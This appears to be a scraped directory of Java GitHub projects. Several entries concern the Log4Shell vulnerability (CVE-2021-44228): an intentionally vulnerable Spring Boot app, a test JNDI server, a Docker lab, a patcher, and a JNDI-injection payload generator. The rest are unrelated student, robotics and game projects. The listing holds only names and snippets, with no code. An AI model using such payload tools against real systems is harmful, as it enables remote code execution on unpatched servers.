Spring Boot web application vulnerable to CVE-2021-44228, nicknamed Log4Shell.

Log4Shell sample vulnerable application (CVE-2021-44228) This repository contains a Spring Boot web application vulnerable to CVE-2021-44228, nickname

Christophe Tafani-Dereeper 1k Jan 5, 2023
An open-source, free, scanner for exotic armour in Hypixel Skyblock

TheExoticsMod An open-source, free, scanner for exotic armour in Hypixel Skyblock! Searches friendslists, the auction house, and inventories to find e

null 4 Dec 26, 2022
Allows acquiring of vanilla/mod assets at runtime instead of including them in builds potentially violating licenses

AssetMover Allows acquiring of vanilla/mod assets at runtime instead of including them in builds potentially violating licenses. Features: Downloading

Cleanroom 5 Nov 26, 2022
This project uses the artificial potential field method to realize the path planning of the robot, and completes the trajectory optimization through other settings. It can also be combined with laser SLAM, target recognition and other technologies for path planning.

FRCAutoDriver 项目说明 Project Instruction 本项目利用人工势场法,实现机器人的路径规划,并通过其他设置完成轨迹优化,还可以结合激光SLAM、目标识别等技术进行路径规划 This project uses the artificial potential field

ZhangzrJerry 2 Sep 9, 2022
This repository is related to the Java Web Developer (ND035), Course - Web Services and APIs

About this Repository This repository is related to the Java Web Developer (ND035), Course - Web Services and APIs It contains the following folders:

Rasha Omran 1 Jan 28, 2022
An assistance platform made using Spring framework that analyses your code, and helps you either to start a devops project, or to turn an existing project into a devops project using open source software (Git, Docker, Jenkins..)

DevOpsify Description An assistance platform made using Spring framework that analyses your code, and helps you either to start a devops project, or t

obaydah bouifadene 14 Nov 8, 2022
This project will help to test the Log4j CVE-2021-44228 vulnerability.

Log4j-JNDIServer This project will help to test the Log4j CVE-2021-44228/CVE-2021-45046 vulnerabilities. Installation and Building Load the project on

Immunity, Inc 9 Jun 30, 2022
Team project within the course of Software System Design and Analysis.

InnoBookCrossing - Application for sharing books at Innopolis Description The application is designed to help people share books with each other. All

Dariya 33 Oct 22, 2022
Served as the team leader to collaborate with another intern for a project and drew up our working schedule

Served as the team leader to collaborate with another intern for a project and drew up our working schedule, risk management plan, quality control plan, configuration management plan, etc Compiled codes for the front end and back end, composed the development documentation and explored SSM structure and MyBatis structure.

bright spark 2 Jan 17, 2022
Restaurant Advisor application created for Munich as part of team project at the university.

Restaurant Advisor Application It is important to mention that this application was created for educational purposes. Restaurants information is taken

Johnpier 1 Oct 16, 2022
GitHub Action to download and install Oracle's Java Development Kit builds

oracle-actions/setup-java This action downloads a Java Development Kit (JDK) built by Oracle and installs it using actions/setup-java. JDKs built by O

Oracle GitHub Actions 43 Dec 15, 2022
Log4shell docker lab using christophetd's vulnerable app and mbechler's marshalsec

log4shell-dockerlab Credits All credits goes to the original authors. I just git-cloned and created a docker-compose file, that's all. LunaSec - log4s

ChoI 7 Nov 17, 2022
Oxygen-log4j-patcher - A tool that upgrades the log4j from an Oxygen installation to version 2.16

Oxygen XML Patch Tool for Apache Log4j vulnerability CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105 This is a tool that updates the log4j version 2

oXygen XML Editor 3 Jan 10, 2022
Log4j-payload-generator - Log4j jndi injects the Payload generator

0x01 简介 log4j-payload-generator是 woodpecker框架 生产log4 jndi注入漏洞payload的插件。目前可以一键生产以下5类payload。 原始payload {[upper|lower]:x}类型随机混payload {[upper|lower]:x}

null 469 Dec 30, 2022
Community-Driven Game Server Development solution for Java Developers based on DEEPINTHINK MagOKO Project.

MagOKO Stack Community-Driven Game Server Development solution for Java Developers based on DEEPINTHINK MagOKO Project. License Copyright 2021-present

DeepInThink Community 10 Jun 1, 2021
Robot Application for void, our 2022 Robot for FIRST Rapid React

void TODO insert cool void logo here Robot Application for void, our 2022 Robot for FIRST Rapid React Building To build the application locally, run .

FRC Team #862, Lightning Robotics 9 Apr 4, 2022
AEMBOT's robot code for the 2022 game RAPID REACT.

FRC_2022 AEMBOT 6443's 2022 FRC Repository Setup and Installation [Start Here](link first time git setup in wiki) Software [Stuff] (wiki or external l

FRC 6443 - AEMBOT 8 Dec 3, 2022